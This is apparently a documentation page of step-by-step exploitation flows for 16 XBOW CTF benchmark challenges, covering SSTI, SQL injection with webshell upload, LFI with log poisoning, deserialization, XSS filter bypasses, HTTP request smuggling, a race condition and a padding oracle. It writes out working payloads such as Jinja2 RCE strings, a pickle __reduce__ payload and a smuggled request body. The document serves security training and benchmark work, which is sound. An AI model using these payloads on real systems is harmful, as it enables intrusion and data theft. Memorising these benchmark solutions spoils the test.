Skip to content

XBOW CTF — Exploitation Flows

Step-by-step exploitation flows for each XBOW benchmark. Only verified flows from actual engagements are documented here; challenges marked To be documented will be added as they are re-verified.

Coverage: 16 / 104 documented

Detailed flows are available for the 16 benchmarks solved and documented during the 2026-03-16 session. The remaining 88 (solved in earlier sessions without per-challenge documentation) will be added incrementally.

Level 2

023 — Loan Calculator - Blind (SSTI)

  1. Login with test:test (credentials in HTML comment)
  2. The /amortization?term= parameter is injected into a Jinja2 {% for row in range({term}) %} loop
  3. Confirm SSTI: ?term=7*7 generates 49 table rows instead of the default
  4. The result is blind — only the number of <tr> rows reveals the evaluated value
  5. Extract flag character-by-character: ?term=cycler.__init__.__globals__.__builtins__.ord(cycler.__init__.__globals__.__builtins__.open('/flag').read()[i]) — count <tr> tags = ASCII ordinal of flag[i]
  6. Iterate over 70 positions to reconstruct the full flag

029 — Bobby Payroll (Blind SQLi + File Upload)

  1. Login form at POST /index.php with username, password, submit=submit (AJAX JSON response)
  2. Boolean oracle: "password" = username found (SQL returned rows), "username" = not found
  3. Use sqlmap to extract credentials: admin / 7d39307ae824e70052c0aa16816a9b16 (MD5 hash, not in common wordlists)
  4. Second-order SQLi bypass: username=' UNION SELECT 0x61646d696e27202d2d20# — the hex decodes to admin' -- which is returned as the username value and reused unescaped in the second auth query, commenting out the password check
  5. After login, upload webshell with double extension bypass: cmd.pdf.php (server checks only that .pdf appears in filename)
  6. Access /uploaded_invoices/cmd.pdf.php?x=cat /FLAG.txt
  1. Login with admin:admin (causes 500 but session is set)
  2. Multi-step registration: step1 (name + password), step2 (email), step3 (is_premium + captcha)
  3. On step3, the name from step1 is rendered inside a <script> tag: alert("Hello NAME...")
  4. Django template engine evaluates the name before browser rendering
  5. Register with name={{messages.storages.0.signer.key}} — this traverses Django's messages framework: messagesstorages[0] (CookieStorage) → signerkey = Django SECRET_KEY
  6. Step3 renders: alert("Hello b'django.http.cookiesFLAG{...}'...") — SECRET_KEY is loaded from the flag file

079 — Poison Inclusion - Protected (LFI)

  1. Blog app "Encoder64" with post.php?id= parameter that includes files from posts/ directory
  2. Protection: str_replace(['../','./','..\\','.\\'], '', $id) — strips traversal sequences
  3. Standard bypasses (....//, ..././) fail because PHP processes the array of needles sequentially
  4. Key bypass: ...../// (5 dots, 3 slashes) — after removing ../ at one position and ./ at another, ../ survives
  5. Confirm traversal: ?id=.....///.....///.....///.....///etc/passwd returns /etc/passwd
  6. Log poisoning: inject PHP in User-Agent header (curl -A "<?php readfile('/FLAG.php'); ?>") → include Apache access log: ?id=.....///.....///.....///.....///var/log/apache2/access.log

082 — Unlogic nginx interaction (Command Injection)

  1. Three-container stack: nginx (static) → flask_app (main) → flask_api (scripts)
  2. /api/set?url=X stores a URL; /name/set?name=X stores a name; /app fetches the stored URL and eval()s the script field from the JSON response
  3. Set name to a JSON payload: /name/set?name={"script":"__import__('os').popen('cat /FLAG.txt').read()"}
  4. Redirect the API URL to the name endpoint: /api/set?url=http://nginx/name/get
  5. Access /app — flask_app fetches from /name/get, parses the JSON, eval()s the script field → RCE
  6. The app uses its own data-store endpoint as exploit infrastructure (no external server needed)

089 — Be the Admin (Privilege Escalation)

  1. Flask app (Werkzeug/3.0.3) with employee login at /employee/login and admin login at /admin/login
  2. Both forms POST to /login with a hidden role field (employee or admin)
  3. Credentials emp:password1 work (metadata says emppassword but DB differs)
  4. Mass assignment: POST /login with username=emp&password=password1&role=admin — server blindly trusts the client-supplied role and writes it into the session
  5. Skip /admin/2fa entirely (it's cosmetic — returns success:true for hardcoded code 1234 but doesn't modify server-side auth state)
  6. Access /admin/dashboard directly with the session cookie → flag in HTML

092 — SKU service (Deserialization)

  1. PHP app with Twig 3.10.3, internal API at skumodel:4455
  2. /skumodel-srv/ directory is exposed on the webroot (Dockerfile COPY bug)
  3. Create a phar archive with malicious metadata: Phar::setMetadata($obj) where $obj->data = "system('cat /flag.txt');" — the ReadClass has eval($this->data) in __wakeup()
  4. Upload base64-encoded phar via POST /skumodel-srv/sku_process.php (data parameter) → saved as /tmp/<hash>.jpg
  5. Trigger deserialization via POST /skumodel-srv/read_sku.php with file_path=/tmp/<hash>.jpg — opens phar://<file>/manifest, triggers unserialize() on metadata → __wakeup()eval() → RCE

097 — XB APP 2 (Path Traversal)

  1. Nginx + PHP app with IIS-themed homepage
  2. Discover two real nginx location blocks: /images (301 redirect) and /admin (301 redirect)
  3. Off-by-slash detection: /admin and /adminXYZ return different responses → confirms real location block
  4. Exploit: /admin../ — nginx alias without trailing slash allows traversal to parent directory
  5. Directory listing reveals: html/ and flag.txt (72 bytes)
  6. Read flag: GET /admin../flag.txt

099 — Get the first (IDOR)

  1. Node.js/Express app with MongoDB — register and login
  2. Registration response includes: userId (MongoDB ObjectId), userNumber: 2, distance: 4, maybehint: "You are 4 from your target user"
  3. Homepage shows first user creation timestamp: 1773665599 (Unix)
  4. ObjectId reconstruction: MongoDB ObjectIds = 4-byte timestamp + 5-byte random + 3-byte counter. Random bytes are identical for same process
  5. Calculate first user's ObjectId: hex(1773665599) + same random bytes + (your_counter - 4)
  6. Access /profile/<reconstructed_objectid> → first user's profile contains the flag

Level 3

018 — Cross 31 (XSS)

  1. Dalgona XSS challenge — Flask app (Python 2.7) at /page?name=
  2. Input is reflected outside the <input> tag in HTML body context
  3. Filter analysis: the sanitizer blocks tags matching regex <[a-yA-Y/]+ — all standard HTML tags
  4. Bypass: the letter z is NOT in the range [a-y], so <z> survives the filter
  5. Payload: <z onfocus=alert('XSS') autofocus tabindex=1> — PhantomJS checker dispatches focus to [autofocus] elements, firing the inline handler
  6. Flag returned in the response when XSS executes successfully

057 — URL Bookmarks (Deserialization)

  1. Flask app with bookmarks cookie containing base64-encoded Python pickle
  2. Decode cookie: gARdlC4=pickle.loads()[] (empty list)
  3. Bookmarks are dicts with name and url keys (discovered by testing [{'name':'X','url':'Y'}])
  4. Craft malicious pickle with __reduce__: return (eval, ("{'name': __import__('os').popen('env | grep FLAG').read().strip(), 'url': 'x'}",))
  5. Base64-encode the pickle, set as bookmarks cookie, request /list
  6. The deserialized dict has the flag as the name field, rendered in the bookmark list

066 — Router Administration (HTTP Smuggling)

  1. Stack: mitmproxy → HAProxy 2.0.5 → Apache+Flask → MySQL
  2. Login with test:test, discover /admin_panel (restricted) and /devices endpoint
  3. Real target: GET /devices/flag/status with Host: internal.router — only routed by HAProxy to internal backend
  4. CL.TE smuggling: HAProxy uses Content-Length, Apache uses Transfer-Encoding: chunked
  5. Send crafted request through HAProxy: POST /login with both Content-Length and Transfer-Encoding: chunked, body contains 0\r\n\r\nGET /devices/flag/status HTTP/1.1\r\nHost: internal.router\r\n\r\n
  6. HAProxy forwards the full body based on Content-Length; Apache processes chunked encoding, sees the smuggled GET as a separate request → flag returned

087 — Cross 30 (XSS)

  1. Dalgona XSS challenge — input injected into JavaScript string context: var name = "INPUT"; document.write('Hello ' + name);
  2. Filter analysis: blocks <, >, ', all uppercase letters, [, ]; only escapes " as \"
  3. Cannot break out of the string with quotes, cannot inject raw HTML tags
  4. Bypass: JavaScript \xNN hex escape sequences are interpreted inside strings — the filter does not block \x
  5. Payload: \x3cscript\x3ealert\x28\x27\x58\x53\x53\x27\x29\x3c/script\x3edocument.write() outputs the decoded HTML at runtime
  6. Flag returned in the response when the alert fires

088 — Router Administration - Concurrency (Race Condition)

  1. Flask app with test:test login, /admin_panel restricted to admin role
  2. Session is server-side; /admin_panel performs two separate session reads: first verify_session() (checks validity), then get_session()["username"] (checks admin role)
  3. Key discovery: a failed login attempt (e.g., admin:wrong_password) overwrites the session's username field to "admin" even though authentication fails
  4. TOCTOU exploit: with the same session cookie, send a failed admin login (POST /login username=admin&password=wrong) in parallel with GET /admin_panel
  5. Timing window ~30ms: the admin login poisons the session username to "admin" between the two reads in /admin_panel
  6. verify_session() passes (session valid from test login) → get_session()["username"] reads "admin" (poisoned) → admin panel rendered with flag

093 — Pay me Back (SSTI)

  1. Flask app for debt tracking — login with user:user
  2. Add transactions with name/email/amount fields; /remind?date=X sends reminders
  3. The date parameter is reflected in the page: "Reminder will be sent on X"
  4. Confirm SSTI: ?date={{7*7}} → page shows "Reminder will be sent on 49"
  5. Escalate to RCE: ?date={{lipsum.__globals__['os'].popen('env').read()}}lipsum is a built-in Jinja2 function with access to os module via __globals__
  6. Flag found in environment variable FLAG

101 — Bad Capcha (Crypto)

  1. Registration form with CAPTCHA image; captcha text is AES-CBC encrypted in cookie captcha (base64)
  2. Padding Oracle detection: submit wrong captcha → "Invalid CAPTCHA!"; tamper last byte of cookie → "Invalid padding" (different error = oracle)
  3. Implement Padding Oracle attack: for each byte position (15→0), try all 256 values for the previous block's corresponding byte
  4. When padding is valid (no "Invalid padding" error), derive the intermediate state byte: intermediate[i] = guess XOR padding_value
  5. Decrypt the plaintext: plaintext[i] = intermediate[i] XOR original_prev_block[i]
  6. ~4096 requests total (256 × 16 bytes) → decrypted captcha text → submit correct captcha → flag returned on successful registration

Level 1 and remaining Level 2

To be documented

The remaining 88 benchmarks (45 Level 1 + 39 Level 2) were solved in earlier sessions without per-challenge exploitation documentation. Detailed flows will be added as challenges are re-verified. See the benchmark catalog for technique summaries.